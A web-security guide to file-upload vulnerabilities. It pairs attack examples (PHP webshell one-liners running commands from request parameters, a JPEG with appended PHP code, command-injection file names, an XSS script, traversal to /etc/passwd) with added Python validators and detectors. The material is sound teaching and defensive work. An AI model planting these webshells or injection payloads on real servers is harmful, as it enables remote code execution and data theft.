1. Unrestricted File Type Upload:
Allowing users to upload files without proper validation can lead to the execution of malicious scripts. An attacker may upload a file with a double extension, such as "malicious.php.jpg", tricking the system into accepting it as an image file while the server still executes it as PHP code.
Example Payloads:
```php
<?php echo passthru($_GET['cmd']); ?>
<?php echo exec($_POST['cmd']); ?>
<?php system($_GET['cmd']); ?>
<?php passthru($_REQUEST['cmd']); ?>
```
Request Snippet:
```http
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXYZ
Content-Disposition: form-data; name="file"; filename="malicious.php.jpg"
Content-Type: image/jpeg
...binary data of the image...
```
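The server-side counterpart to the double-extension trick, as an added example that is not part of the original post: the final extension is checked against an allow-list, any executable segment anywhere in the name (the `php` in `malicious.php.jpg`) is rejected, the first bytes of the body must match the claimed image type, and the client's name is never reused on disk. The allow-list contents, the executable-segment list and the magic-byte table are assumptions chosen for the example.

```python
import secrets

# Final extensions we accept, mapped to the Content-Type we will serve them with.
# The Content-Type sent by the client is never used for this decision.
ALLOWED_EXTENSIONS = {"jpg": "image/jpeg", "jpeg": "image/jpeg",
                      "png": "image/png", "gif": "image/gif"}

# Segments that must not appear anywhere in the name, not only at the end:
# "shell.php.jpg" is rejected because some server configurations dispatch
# on any dot-separated segment, not just the last one.
EXECUTABLE_SEGMENTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar",
                       "asp", "aspx", "jsp", "jspx", "cgi", "pl", "py", "sh", "htaccess"}

# Leading bytes ("magic") each allowed type must start with.
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
         "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}


def check_filename(filename: str) -> tuple:
    """Return (accepted, extension-or-reason) for a client-supplied name."""
    # Keep only the last path component; directory parts are never honoured.
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if not base or base.startswith(".") or "\x00" in base:
        return False, "empty, hidden or NUL-containing name"
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return False, "missing extension"
    for segment in parts[1:]:
        if segment in EXECUTABLE_SEGMENTS:
            return False, f"executable segment '{segment}' in name"
    if parts[-1] not in ALLOWED_EXTENSIONS:
        return False, f"extension '{parts[-1]}' not in allow-list"
    return True, parts[-1]


def content_matches(data: bytes, ext: str) -> bool:
    """Cheap check that the body really starts like the claimed image type."""
    return data.startswith(MAGIC[ext])


def accept_upload(filename: str, data: bytes) -> tuple:
    """Validate name and content; on success return a server-generated stored name."""
    ok, info = check_filename(filename)
    if not ok:
        return False, info
    if not content_matches(data, info):
        return False, "content does not match declared type"
    # The original name is never used on disk: a random name with the
    # validated extension defeats double-extension and traversal tricks.
    return True, f"{secrets.token_hex(16)}.{info}"
```

The magic-byte check only proves the file begins like an image; a real JPEG with PHP appended passes it, which is why uploads also belong in a location the web server will not execute from.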
2. File Size Limit Bypass:
Attackers can attempt to bypass file size restrictions by compressing files or splitting them into smaller parts. This may allow them to upload content exceeding the specified limits.
Example Payload:
```bash
# Splitting a file into parts
split -b 1M largefile.txt part
```
Request Snippet:
```http
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXYZ
Content-Disposition: form-data; name="file"; filename="part1"
Content-Type: text/plain
...binary data of part 1...
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXYZ
Content-Disposition: form-data; name="file"; filename="part2"
Content-Type: text/plain
...binary data of part 2...
```
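Size limits that survive the compression and splitting tricks above, as an added example that is not from the original post: the body is counted as it streams in rather than trusting Content-Length, and an uploaded archive is inspected for its declared unpacked size and compression ratio before any member is extracted. The limits (5 MiB raw, 20 MiB unpacked, ratio 50) and the sample archives are assumptions constructed for the example.

```python
import io
import zipfile

MAX_UPLOAD_BYTES = 5 * 1024 * 1024     # raw bytes accepted per request (assumed policy value)
MAX_UNPACKED_BYTES = 20 * 1024 * 1024  # what an archive may claim to expand to (assumed)
MAX_UNPACK_RATIO = 50                  # declared/compressed ratio above this is treated as a bomb


class UploadTooLarge(Exception):
    pass


def read_limited(stream, limit: int = MAX_UPLOAD_BYTES, chunk: int = 64 * 1024) -> bytes:
    """Read a request body in chunks and count the bytes ourselves.

    Content-Length is attacker-controlled and absent under chunked transfer
    encoding, so the running count is the only number that is trusted.
    """
    buf = bytearray()
    while True:
        piece = stream.read(chunk)
        if not piece:
            return bytes(buf)
        buf.extend(piece)
        if len(buf) > limit:
            raise UploadTooLarge(f"body exceeded {limit} bytes")


def exceeds_limit(data: bytes, limit: int) -> bool:
    """Convenience wrapper: True if read_limited would reject this body."""
    try:
        read_limited(io.BytesIO(data), limit=limit)
    except UploadTooLarge:
        return True
    return False


def check_archive(data: bytes) -> tuple:
    """Inspect a zip's central directory before extracting anything.

    The declared sizes can themselves be forged, so real extraction must
    still go through read_limited() on each member (see extract_member).
    """
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return False, "not a valid zip archive"
    total = 0
    for info in zf.infolist():
        total += info.file_size
        if info.compress_size and info.file_size / info.compress_size > MAX_UNPACK_RATIO:
            return False, f"suspicious compression ratio for {info.filename}"
        if info.filename.startswith("/") or ".." in info.filename.split("/"):
            return False, f"unsafe member path {info.filename}"
    if total > MAX_UNPACKED_BYTES:
        return False, f"archive declares {total} unpacked bytes"
    return True, f"{len(zf.infolist())} members, {total} bytes declared"


def extract_member(zf: zipfile.ZipFile, name: str) -> bytes:
    """Extract one member while enforcing the unpacked limit on actual bytes."""
    with zf.open(name) as member:
        return read_limited(member, limit=MAX_UNPACKED_BYTES)


def build_sample_zip(payload: bytes, name: str = "data.bin") -> bytes:
    """Constructed sample archive (not a real upload) for exercising the checks."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()
```

Split uploads are only a bypass when the limit is per request; a per-user storage quota counted across requests closes that path, and the same `read_limited` counter is the place to enforce it.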
3. Malicious File Content:
Attackers may manipulate file content to include malicious scripts or payloads, exploiting vulnerabilities in server-side processing.
Example Payload:
```html
<script>alert('XSS Attack');</script>
```
Request Snippet:
```http
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXYZ
Content-Disposition: form-data; name="file"; filename="malicious.html"
Content-Type: text/html
<script>alert('XSS Attack');</script>
```
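What turns the uploaded HTML above into stored XSS is serving it back with the type the uploader declared. As an added example (not code from the original post), the vulnerable header pattern is shown beside the hardened one: the Content-Type comes from a server-side allow-list decided at upload time, anything outside it is forced to a download, and `nosniff` plus a sandboxing CSP stop the browser from rendering or executing it anyway. The allow-list contents are an assumption.

```python
# Extensions that may be rendered inline, with the Content-Type we decided at
# upload time. Everything else (HTML, SVG, XML, ...) is forced to a download.
INLINE_TYPES = {"jpg": "image/jpeg", "jpeg": "image/jpeg",
                "png": "image/png", "gif": "image/gif"}


def unsafe_download_headers(stored_name: str, client_type: str) -> dict:
    """Vulnerable pattern: echo the type the uploader declared and let the browser render it."""
    return {"Content-Type": client_type,
            "Content-Disposition": f'inline; filename="{stored_name}"'}


def download_headers(stored_name: str) -> dict:
    """Hardened pattern: type from the server-side allow-list, never from the upload request.

    stored_name is assumed to be server-generated (see the validator example),
    so it is safe to place inside the quoted filename parameter.
    """
    ext = stored_name.rsplit(".", 1)[-1].lower() if "." in stored_name else ""
    headers = {
        # Stop browsers from sniffing an "image" into HTML.
        "X-Content-Type-Options": "nosniff",
        # Even if something does render, it gets no scripts and no origin privileges.
        "Content-Security-Policy": "sandbox; default-src 'none'",
    }
    if ext in INLINE_TYPES:
        headers["Content-Type"] = INLINE_TYPES[ext]
        headers["Content-Disposition"] = f'inline; filename="{stored_name}"'
    else:
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = f'attachment; filename="{stored_name}"'
    return headers
```

Serving user content from a separate origin (a dedicated downloads hostname) is the complementary control: even a file that does execute then runs without the application's cookies or session.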
4. Path Traversal Attacks:
Path traversal vulnerabilities may allow attackers to upload files outside the intended directory, potentially gaining unauthorized access to sensitive information.
Note that the restriction may not apply to the parent directory!
Example Payload:
```http
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXYZ
Content-Disposition: form-data; name="file"; filename="../sensitivefile.txt"
Content-Type: text/plain
...binary data of the file...
```
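A containment check that holds at any depth, as an added example that is not from the original post: the target is joined to the storage root and fully resolved (collapsing `..`, symlinks and absolute-path overrides) before testing that it still lies under the root, so a filter that only looks one directory up is not the control being relied on. The `/var/app/uploads` root is an assumed path; the check works the same whether or not it exists.

```python
from pathlib import Path

# Assumed storage root; in practice a directory outside the web server's document root.
UPLOAD_ROOT = Path("/var/app/uploads")


def resolve_under(root: Path, relative: str):
    """Return the absolute target if it stays inside root, else None.

    Join first, resolve second, compare third: resolving collapses '..',
    follows symlinks and lets an absolute path replace the root, all of
    which must have happened before the containment test is meaningful.
    Any URL decoding of the name must happen before calling this.
    """
    base = root.resolve()
    candidate = (base / relative).resolve()
    if candidate == base or not candidate.is_relative_to(base):
        return None
    return candidate


def is_contained(relative: str, root: Path = UPLOAD_ROOT) -> bool:
    """Boolean form of resolve_under for the filter that gates the upload."""
    return resolve_under(root, relative) is not None
```

In practice the client's name should not reach the filesystem at all (a server-generated name removes the problem), but legacy layouts that keep user names need exactly this check on every write and read.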
Remote Command Execution (RCE) via File Name Parameter
If the application includes custom image processing or file manipulation, it may be susceptible to remote command execution through code injection in the file name.
Example Valid File Names and Payloads:
| File Name | Payload | Outcome if Vulnerable |
|---|---|---|
| a$(whoami)z.jpg | $(whoami) | a[CURRENT USER]z.jpg |
| a`whoami`z.jpg | `whoami` | a[CURRENT USER]z.jpg |
| a;sleep 30;z.jpg | ;sleep 30; | The application will take 30+ seconds to respond |
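The injection in the table works only because the file name reaches a shell. As an added example (not code from the original post), the vulnerable string-building pattern is shown next to the hardened one, which passes an argv list with no shell and only accepts a strict server-generated name, plus a small detector that flags the table's three names when run over constructed upload-log lines. The `convert` invocation, the name pattern and the log format are assumptions made for the example.

```python
import re
import subprocess

# Names handed to external tools are server-generated, so the allow-list can be strict.
PROCESSING_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]{0,63}\.(jpg|jpeg|png|gif)$")

# Characters that let a name change the meaning of a shell command line.
SHELL_META = re.compile(r"[;&|`$(){}<>\n\r'\"\\ ]")


def is_safe_processing_name(name: str) -> bool:
    return PROCESSING_NAME.fullmatch(name) is not None


def build_resize_command_vulnerable(name: str) -> str:
    """Vulnerable pattern: the name is interpolated into a string run with shell=True,
    so $(...), backticks and ';' inside it are interpreted by /bin/sh."""
    return f"convert {name} -resize 200x200 thumb_{name}"


def build_resize_command(stored_name: str) -> list:
    """Hardened pattern: an argv list (no shell) on a name that passed the allow-list.

    The allow-list also keeps the tool itself from seeing special filename
    syntax, which argv passing alone would not prevent.
    """
    if not is_safe_processing_name(stored_name):
        raise ValueError(f"name rejected: {stored_name!r}")
    return ["convert", stored_name, "-resize", "200x200", f"thumb_{stored_name}"]


def run_resize(stored_name: str) -> None:
    # shell=False is the default; spelled out because it is the whole point.
    subprocess.run(build_resize_command(stored_name), shell=False, check=True, timeout=30)


# Constructed upload-log lines (not from a real system), one per line in the
# form "<client> <status> <uploaded filename>", to run the detector over.
SAMPLE_UPLOAD_LOG = """\
10.0.0.5 200 holiday.jpg
10.0.0.9 200 a$(whoami)z.jpg
10.0.0.9 200 a`whoami`z.jpg
10.0.0.9 500 a;sleep 30;z.jpg
10.0.0.7 200 report-final.png
"""


def flag_suspicious_uploads(log_text: str) -> list:
    """Return (client, filename) pairs whose filename carries shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        client, _status, filename = line.split(" ", 2)
        if SHELL_META.search(filename):
            hits.append((client, filename))
    return hits
```

A 500 paired with a long response time on a name containing `sleep`, as in the fourth constructed line, is the pattern the table's last row predicts and is worth alerting on.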
5. Denial of Service (DoS) through File Uploads:
Attackers may overwhelm the server by uploading a large number of files simultaneously.
Example Payload:
```bash
# Generating a large file
dd if=/dev/zero of=largefile.txt bs=1M count=100
```
Request Snippet:
```http
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXYZ
Content-Disposition: form-data; name="file"; filename="largefile.txt"
Content-Type: application/octet-stream
...binary data of the large file...
```
6. Image-Based Attacks (Polyglot):
These attacks exploit vulnerabilities in image processing libraries to execute arbitrary code. A simple way to achieve this is to use exiftool to embed the PHP webshell in the image's comment metadata.
Example Payload (Image with Embedded Malicious Code):
```bash
# Embedding malicious code in an image
echo -n '<?php system("ls -la"); ?>' >> malicious.jpg
```
Request Snippet:
```http
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXYZ
Content-Disposition: form-data; name="file"; filename="malicious.jpg"
Content-Type: image/jpeg
...binary data of the image...
```
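Both polyglot variants above (bytes appended with `>>`, and a webshell written into a comment segment by exiftool) leave a trace in the JPEG structure that a magic-byte check misses. As an added example that is not from the original post, this walks the JPEG segment list and reports data after the EOI marker and script markers inside COM/APPn metadata segments; the minimal JPEG skeleton it is tested against is constructed for the example and is not a decodable picture.

```python
import struct

# Byte sequences that have no business inside an image file.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


def jpeg_findings(data: bytes) -> list:
    """Walk the JPEG segment structure and report anything a webshell would need.

    Reports bytes appended after the EOI marker (the `>>` trick), script
    markers inside COM/APPn metadata segments (where exiftool writes
    comments), and structural breakage a decoder would also reject.
    """
    findings = []
    if not data.startswith(b"\xff\xd8"):
        return ["not a JPEG (missing SOI)"]
    pos, n = 2, len(data)
    while pos + 2 <= n:
        if data[pos] != 0xFF:
            findings.append(f"expected marker at offset {pos}")
            return findings
        marker = data[pos + 1]
        if marker == 0xD9:  # EOI: nothing legitimate follows
            trailing = data[pos + 2:]
            if trailing:
                findings.append(f"{len(trailing)} bytes after EOI")
                if any(m in trailing for m in SCRIPT_MARKERS):
                    findings.append("script marker in trailing data")
            return findings
        if marker == 0xFF:  # fill byte
            pos += 1
            continue
        if marker == 0x01 or 0xD0 <= marker <= 0xD8:  # standalone markers, no length
            pos += 2
            continue
        if pos + 4 > n:
            findings.append("truncated segment header")
            return findings
        seglen = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        segment = data[pos + 4:pos + 2 + seglen]
        if marker == 0xFE or 0xE0 <= marker <= 0xEF:  # COM / APPn metadata
            if any(m in segment for m in SCRIPT_MARKERS):
                findings.append(f"script marker inside segment 0x{marker:02X} at offset {pos}")
        pos += 2 + seglen
        if marker == 0xDA:  # SOS: skip entropy-coded data up to the next real marker
            while pos + 1 < n:
                if data[pos] == 0xFF and data[pos + 1] != 0x00 and not 0xD0 <= data[pos + 1] <= 0xD7:
                    break
                pos += 1
    findings.append("no EOI marker found")
    return findings


def build_sample_jpeg(comment: bytes = b"", trailing: bytes = b"") -> bytes:
    """Constructed minimal JPEG skeleton (not a decodable picture) for exercising the walk."""
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    out = b"\xff\xd8\xff\xe0" + struct.pack(">H", len(app0) + 2) + app0
    if comment:
        out += b"\xff\xfe" + struct.pack(">H", len(comment) + 2) + comment
    sos = b"\x01\x01\x00\x00\x3f\x00"
    out += b"\xff\xda" + struct.pack(">H", len(sos) + 2) + sos
    out += b"\x12\x34\x56\xff\x00\x78"  # entropy data including a stuffed 0xFF00
    return out + b"\xff\xd9" + trailing
```

Treat this as a detector, not the control: the durable mitigation is to re-encode every accepted image (which drops trailing bytes and metadata) and to store uploads where no interpreter will ever run them.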
7. Insecure Direct Object References (IDOR):
File upload functionalities may introduce IDOR vulnerabilities, allowing attackers to manipulate file references.
Example Payload:
```http
GET /download?file=../../../etc/passwd HTTP/1.1
```
In this case, an attacker manipulates the file parameter to access sensitive files.
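The fix for the download request above is to stop accepting file references that mean anything on the filesystem. As an added example (not code from the original post), files are registered under opaque random ids, the `file` parameter is only ever used as a dictionary key, and the owner is checked on every access, with missing and forbidden ids producing the same response. The user names, the stored path and the handler's status-code convention are assumptions for the example.

```python
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class StoredFile:
    file_id: str       # opaque random token: the only reference clients ever see
    owner: str         # principal allowed to fetch it
    storage_path: str  # server-side location, never exposed to or accepted from a client


class FileStore:
    """Indirect reference map: clients name files by token, never by path."""

    def __init__(self):
        self._by_id = {}

    def register(self, owner: str, storage_path: str) -> str:
        file_id = secrets.token_urlsafe(24)  # 192 random bits: not guessable or enumerable
        self._by_id[file_id] = StoredFile(file_id, owner, storage_path)
        return file_id

    def path_for_download(self, requester: str, file_id: str):
        """Authorization check on every access. Missing and forbidden both
        return None so the response does not reveal whether the id exists."""
        record = self._by_id.get(file_id)
        if record is None or record.owner != requester:
            return None
        return record.storage_path


def handle_download(store: FileStore, requester: str, file_param: str) -> tuple:
    """Request handler: the query parameter is never joined to a path, only looked up."""
    path = store.path_for_download(requester, file_param)
    if path is None:
        return 404, None
    return 200, path


def demo() -> tuple:
    """Constructed scenario: two users, one file, one traversal-style request."""
    store = FileStore()
    fid = store.register("alice", "/var/app/uploads/3f9c.jpg")  # assumed storage path
    return (handle_download(store, "alice", fid)[0],
            handle_download(store, "bob", fid)[0],
            handle_download(store, "bob", "../../../etc/passwd")[0])
```

A random id on its own is not authorization: the ownership test in `path_for_download` is what stops a leaked or shared link from becoming a permanent bypass.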
These examples illustrate the technical aspects of common file upload vulnerabilities and highlight the importance of implementing robust security measures to protect against them. Always validate, sanitize, and restrict file uploads to ensure the integrity and security of your web application.